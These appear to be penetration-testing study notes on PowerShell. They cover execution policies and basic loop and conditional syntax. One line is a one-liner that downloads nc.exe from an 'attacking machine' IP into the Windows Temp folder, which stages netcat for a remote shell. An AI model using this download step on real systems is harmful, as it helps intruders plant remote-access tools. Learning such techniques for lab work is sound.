PowerShell execution policies determine your authorization to execute PowerShell (PS) scripts or not:

1. Restricted: [default] Blocks all use of PS scripts
2. AllSigned: Requires PS scripts to e signed by a trusted publisher
3. RemoteSigned: This is a common “normal” setting in many systems…
   1. Allows any PS script written on the local machine.
   2. But requires downloaded scripts to be signed by a trusted publisher.
4. Unrestricted: Allows any PS script but prompts you for confirmation on downloaded scripts.
5. Bypass: Allows any and all PS scripts. Have at it!

A very useful one-liner to download a file (nc.exe) from an attacking machine (IP 192.168.77.128) and save it in C:\Windows\Temp using the same name:

(New-Object System.Net.WebClient).DownloadFile("http://192.168.77.128/nc.exe", "C:\Windows\Temp\nc.exe")

Example: For Loop

Write-Host "Hello world!"

# Count up by one...
for ($var=1; $var -le 5; $var++)
{
    Write-Host "The value of var is: $var"
}

# Count up by two...
for ($var=0; $var -le 10; $var=$var+2)
{
    Write-Host "The value of var is: $var"
}

Example: Conditional

$a = 2
if ( $a -gt 2 )
{
    Write-Host "The value $a is greater than 2."
}
elseif ( $a -eq 2 )
{
    Write-Host "The value $a is equal to 2."
}
else
{
    Write-Host ( "The value of $a is less than 2" + " or was not created or initialized." )
}